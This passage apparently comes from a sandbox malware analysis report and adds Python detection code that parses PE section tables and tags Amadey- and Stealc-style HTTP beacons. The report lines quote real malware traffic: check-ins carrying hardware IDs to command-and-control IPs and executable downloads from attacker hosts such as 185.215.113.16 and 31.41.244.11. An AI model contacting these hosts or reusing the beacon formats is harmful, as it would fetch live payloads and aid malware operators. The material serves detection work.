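    "20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 "
    "00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0",
    "2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 "
    "00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0",
    "2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 "
    "00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0",
    "78 62 6d 66 7a 76 68 62 00 e0 29 00 00 a0 00 00 00 d2 29 00 00 3a 00 00 "
    "00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0",
    "7a 74 67 67 72 6c 70 7a 00 20 00 00 00 80 2a 00 00 06 00 00 00 0c 2a 00 "
    "00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0",
    "2e 74 61 67 67 61 6e 74 00 40 00 00 00 a0 2a 00 00 22 00 00 00 12 2a 00 "
    "00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0",
]

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000
# Assumed allow-list: names a normal MSVC/MinGW/Delphi link produces.
STANDARD_NAMES = {".text", ".rdata", ".data", ".rsrc", ".reloc", ".idata", ".edata",
                  ".pdata", ".bss", ".tls", ".CRT", ".didat", ".gfids", ".00cfg",
                  "CODE", "DATA", "BSS"}


@dataclass
class Section:
    raw_name: bytes
    name: str
    virtual_size: int
    virtual_address: int
    raw_size: int
    raw_ptr: int
    characteristics: int


def build_constructed_header(section_hex: List[str]) -> bytes:
    """Constructed test image: MZ header with e_lfanew=0x80, PE signature, a COFF
    header matching the dump (i386, 0xE0-byte optional header), a zeroed optional
    header, then the transcribed section table.  Only the table bytes are real."""
    dos = b"MZ" + b"\x00" * 58 + struct.pack("<I", 0x80)      # e_lfanew lives at 0x3C
    dos += b"\x00" * (0x80 - len(dos))
    coff = struct.pack("<HHIIIHH", 0x14C, len(section_hex), 0x652C2850, 0, 0, 0xE0, 0x0022)
    table = b"".join(bytes.fromhex(h) for h in section_hex)
    return dos + b"PE\x00\x00" + coff + b"\x00" * 0xE0 + table


def parse_sections(data: bytes) -> List[Section]:
    """Walk MZ -> e_lfanew -> COFF header -> section table of a PE file."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("PE signature not at e_lfanew")
    coff = e_lfanew + 4
    _, nsections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    table = coff + 20 + opt_size
    if table + nsections * 40 > len(data):
        raise ValueError("section table truncated")
    sections = []
    for i in range(nsections):
        (raw_name, vsize, va, rsize, rptr,
         _, _, _, _, chars) = struct.unpack_from("<8sIIIIIIHHI", data, table + i * 40)
        # The loader treats the name as NUL-terminated within its 8 bytes.
        name = raw_name.split(b"\x00", 1)[0].decode("latin-1")
        sections.append(Section(raw_name, name, vsize, va, rsize, rptr, chars))
    return sections


def section_findings(sections: List[Section]) -> List[Tuple[int, str, List[str]]]:
    """Return (index, name, reasons) for every section that looks packed/protected."""
    out = []
    for i, s in enumerate(sections):
        why = []
        if not s.name or any(not ("!" <= c <= "~") for c in s.name):
            why.append("whitespace/non-printable in name")
        after_nul = s.raw_name.split(b"\x00", 1)[1] if b"\x00" in s.raw_name else b""
        if after_nul.strip(b"\x00"):
            why.append("non-zero bytes after NUL terminator")
        if not s.name.startswith(".") and s.name not in STANDARD_NAMES:
            why.append("non-standard name")
        if s.name == ".taggant":
            why.append("IEEE software taggant block, typical of commercial protectors")
        if s.characteristics & IMAGE_SCN_MEM_EXECUTE and s.characteristics & IMAGE_SCN_MEM_WRITE:
            why.append("writable and executable")
        if s.raw_size == 0 and s.virtual_size:
            why.append("no data on disk, filled at runtime")
        if why:
            out.append((i, s.name, why))
    return out


if __name__ == "__main__":
    # Pass a PE path to inspect a real file; with no argument, use the constructed image.
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_constructed_header(SECTION_HEADERS_HEX)
    secs = parse_sections(data)
    for s in secs:
        print(f"{s.name!r:12} va=0x{s.virtual_address:06x} vsize=0x{s.virtual_size:06x} "
              f"raw=0x{s.raw_size:06x} chars=0x{s.characteristics:08x}")
    for _, name, why in section_findings(secs):
        print(f"  {name!r}: {'; '.join(why)}")
```

Run against one of the dropped files from this report, every section except .rsrc trips at least one check; .rsrc survives because it is read/write only and carries a clean, NUL-padded name. The "non-zero bytes after NUL terminator" check is the cheapest way to catch the all-spaces name in the first entry, which a display that trims whitespace would otherwise render as empty.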
Source: global traffic HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 31 32 39 37 35 42 34 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB12975B45F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: GET /files/6802601040/SxQyhJr.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 30 34 38 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1010480001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 30 34 38 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1010481001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 30 34 38 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1010482001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGCGDBGCAAEBFIECGHDGHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 34 37 31 37 35 42 36 37 42 38 31 31 30 37 33 34 30 34 30 39 0d 0a 2d 2d 2d 2d 2d 2d 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 72 75 6d 0d 0a 2d 2d 2d 2d 2d 2d 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 47 2d 2d 0d 0a Data Ascii: ------DGCGDBGCAAEBFIECGHDGContent-Disposition: form-data; name="hwid"C47175B67B81107340409------DGCGDBGCAAEBFIECGHDGContent-Disposition: form-data; name="build"drum------DGCGDBGCAAEBFIECGHDG--
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 30 34 38 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1010483001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 30 34 38 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1010484001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /files/unique1/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 30 34 38 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1010485001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /files/unique2/random.exe HTTP/1.1Host: 31.41.244.11
Source: Joe Sandbox View IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View IP Address: 34.149.100.209 34.149.100.209
Source: Joe Sandbox View IP Address: 185.215.113.16 185.215.113.16
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View JA3 fingerprint: fb0aa01abe9d8e4037eb3473ca6e2dca
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49765 -> 31.41.244.11:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49782 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49797 -> 104.21.16.9:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49803 -> 104.21.16.9:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49810 -> 104.21.16.9:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49815 -> 104.21.16.9:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49823 -> 104.21.16.9:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49822 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49828 -> 104.21.16.9:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49836 -> 104.21.16.9:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49800 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49840 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49877 -> 104.21.16.9:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49892 -> 31.41.244.11:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49894 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49924 -> 31.41.244.11:80
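The POSTs to 185.215.113.43 and 185.215.113.206 and the executable fetches from 31.41.244.11 and 185.215.113.16 share a few traits that are cheap to check on a proxy or IDS export: a bare-IP Host header, no User-Agent (the pattern behind the ETPRO "Common Downloader Header Pattern" alerts above), tiny form-urlencoded bodies in which d1 steps by 1000 per request while unit stays 246122658369, and a multipart check-in that carries only hwid and build. The Python below is an added example written for this page, not Joe Sandbox or Suricata logic. The request texts are reconstructed from the lines above with their CRLFs restored; the tag names are the author's, and treating these body shapes as Amadey- and Stealc-style traffic rests only on the families this report already attributes to the sample, not on any claim about what the fields mean.

```python
"""Added example: classify captured HTTP requests by the traits seen in this report."""
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List
from urllib.parse import parse_qs

# Requests reconstructed from the "HTTP traffic detected" lines above; the
# report prints them with CRLFs stripped, so line breaks are restored by hand
# and bodies are copied from the "Data Ascii" fields.
SAMPLES = {
    "amadey_status": (
        "POST /Zu7JuNko/index.php HTTP/1.1\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        "Host: 185.215.113.43\r\nContent-Length: 4\r\nCache-Control: no-cache\r\n\r\n"
        "st=s"
    ),
    "amadey_task_1": (
        "POST /Zu7JuNko/index.php HTTP/1.1\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        "Host: 185.215.113.43\r\nContent-Length: 31\r\nCache-Control: no-cache\r\n\r\n"
        "d1=1010480001&unit=246122658369"
    ),
    "amadey_task_2": (
        "POST /Zu7JuNko/index.php HTTP/1.1\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        "Host: 185.215.113.43\r\nContent-Length: 31\r\nCache-Control: no-cache\r\n\r\n"
        "d1=1010481001&unit=246122658369"
    ),
    "stealc_checkin": (
        "POST /c4becf79229cb002.php HTTP/1.1\r\n"
        "Content-Type: multipart/form-data; boundary=----DGCGDBGCAAEBFIECGHDG\r\n"
        "Host: 185.215.113.206\r\nContent-Length: 210\r\n"
        "Connection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
        "------DGCGDBGCAAEBFIECGHDG\r\n"
        'Content-Disposition: form-data; name="hwid"\r\n\r\nC47175B67B81107340409\r\n'
        "------DGCGDBGCAAEBFIECGHDG\r\n"
        'Content-Disposition: form-data; name="build"\r\n\r\ndrum\r\n'
        "------DGCGDBGCAAEBFIECGHDG--\r\n"
    ),
    "payload_fetch": "GET /luma/random.exe HTTP/1.1\r\nHost: 185.215.113.16\r\n\r\n",
    "payload_fetch_with_ua": (
        "GET /off/def.exe HTTP/1.1\r\nConnection: Keep-Alive\r\n"
        "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
        "(KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36\r\n"
        "Host: 185.215.113.16\r\n\r\n"
    ),
    "ip_lookup": "GET /ip HTTP/1.1\r\nHost: httpbin.org\r\nAccept: */*\r\n\r\n",
    "firefox_portal_check": (
        "GET /canonical.html HTTP/1.1\r\nHost: detectportal.firefox.com\r\n"
        "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) "
        "Gecko/20100101 Firefox/118.0\r\nAccept: */*\r\n\r\n"
    ),
}

BARE_IP = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?$")
# Body key sets observed in this report's index.php POSTs (assumed signature).
AMADEY_BODY_SHAPES = ({"st"}, {"r"}, {"d1", "unit"})


@dataclass
class Request:
    method: str
    path: str
    headers: Dict[str, str]   # lower-cased header names
    body: str


def parse_request(raw: str) -> Request:
    """Minimal HTTP/1.1 request parser: request line, headers, body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    return Request(method, path, headers, body)


def multipart_fields(req: Request) -> Dict[str, str]:
    """Extract name=value pairs from a multipart/form-data body."""
    match = re.search(r"boundary=([^;\s]+)", req.headers.get("content-type", ""))
    if not match:
        return {}
    fields = {}
    for part in req.body.split("--" + match.group(1)):
        if part.strip() in ("", "--"):
            continue                       # preamble or closing delimiter
        part_headers, _, value = part.partition("\r\n\r\n")
        name = re.search(r'name="([^"]+)"', part_headers)
        if name:
            fields[name.group(1)] = value.rstrip("\r\n")
    return fields


def classify(req: Request) -> List[str]:
    """Tag one request with every trait it matches; an empty list means nothing fired."""
    tags = []
    host = req.headers.get("host", "")
    ctype = req.headers.get("content-type", "")
    bare_ip = bool(BARE_IP.match(host))
    if bare_ip and "user-agent" not in req.headers:
        tags.append("bare-ip-no-user-agent")
    if req.method == "GET" and bare_ip and req.path.lower().endswith(".exe"):
        tags.append("exe-download-from-bare-ip")
    if (req.method == "POST" and ctype.startswith("application/x-www-form-urlencoded")
            and req.path.endswith("/index.php")):
        if set(parse_qs(req.body, keep_blank_values=True)) in AMADEY_BODY_SHAPES:
            tags.append("amadey-style-beacon")
    if req.method == "POST" and ctype.startswith("multipart/form-data"):
        if {"hwid", "build"} <= set(multipart_fields(req)):
            tags.append("stealc-style-checkin")
    if host == "httpbin.org" and req.path == "/ip":
        tags.append("external-ip-lookup")
    return tags


def shared_unit_tokens(reqs: Iterable[Request]) -> Dict[str, int]:
    """Count form POSTs that reuse the same unit= value: a constant token across
    a run of beacons is what ties the task reports above to one infected host."""
    counts: Dict[str, int] = {}
    for r in reqs:
        if r.method == "POST" and r.headers.get("content-type", "").startswith("application/x-www-form-urlencoded"):
            for unit in parse_qs(r.body).get("unit", []):
                counts[unit] = counts.get(unit, 0) + 1
    return counts
```

The Chrome-UA fetch of /off/def.exe is why the two download rules are kept separate: adding a browser User-Agent defeats the header-pattern check but not the bare-IP-plus-.exe check, and the Firefox captive-portal probes show that a legitimate request with a real hostname and User-Agent trips neither.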
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43 (10 connections)
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11 (40 connections)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_006EBE30 Sleep,InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile, 6_2_006EBE30
Source: global traffic HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global traffic HTTP traffic detected: GET /files/6802601040/SxQyhJr.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/unique1/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /files/unique2/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/UpdateService.canUsuallyCheckForUpdates - unable to automatically check for updates, the option has been disabled by the administrator.jar:file:///C:/Program%20Files/Mozilla%20Firefox/browser/features/pictureinpicture@mozilla.org.xpi!/experiment-apis/aboutConfigPipPrefs.js equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/UpdateService.canUsuallyCheckForUpdates - unable to automatically check for updates, the option has been disabled by the administrator.jar:file:///C:/Program%20Files/Mozilla%20Firefox/browser/features/pictureinpicture@mozilla.org.xpi!/experiment-apis/aboutConfigPipPrefs.js equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: BETWEEN 'www.' || :strippedURL AND 'www.' || :strippedURL || X'FFFF'moz-extension://a581a2f1-688c-434b-8db8-16166b1993d9/lib/intervention_helpers.jsIt looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single functionYou may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEYyj8zLJVJc//j1xARfPx+oE/xqqM7O7tEZ9+XMWBeEQCqbJZRV8YS8VVq7GffqygmqryEGBhGRP5MX05XlfMO0cKletwojy/g/uWNoFAMYM3K/5640rSS53JHtjagJJEhttps://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSyC7jsptDS3am4tPx4r3nxis7IMjBc5Dovo&$httpMethod=POST[{incognito:null, tabId:null, types:null, urls:["https://watch.sling.com/*", "https://www.sling.com/*"], windowId:null}, ["blocking", "requestHeaders"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: BETWEEN 'www.' || :strippedURL AND 'www.' || :strippedURL || X'FFFF'moz-extension://a581a2f1-688c-434b-8db8-16166b1993d9/lib/intervention_helpers.jsIt looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single functionYou may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEYyj8zLJVJc//j1xARfPx+oE/xqqM7O7tEZ9+XMWBeEQCqbJZRV8YS8VVq7GffqygmqryEGBhGRP5MX05XlfMO0cKletwojy/g/uWNoFAMYM3K/5640rSS53JHtjagJJEhttps://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSyC7jsptDS3am4tPx4r3nxis7IMjBc5Dovo&$httpMethod=POST[{incognito:null, tabId:null, types:null, urls:["https://watch.sling.com/*", "https://www.sling.com/*"], windowId:null}, ["blocking", "requestHeaders"]] equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: BETWEEN 'www.' || :strippedURL AND 'www.' || :strippedURL || X'FFFF'moz-extension://a581a2f1-688c-434b-8db8-16166b1993d9/lib/intervention_helpers.jsIt looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single functionYou may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more 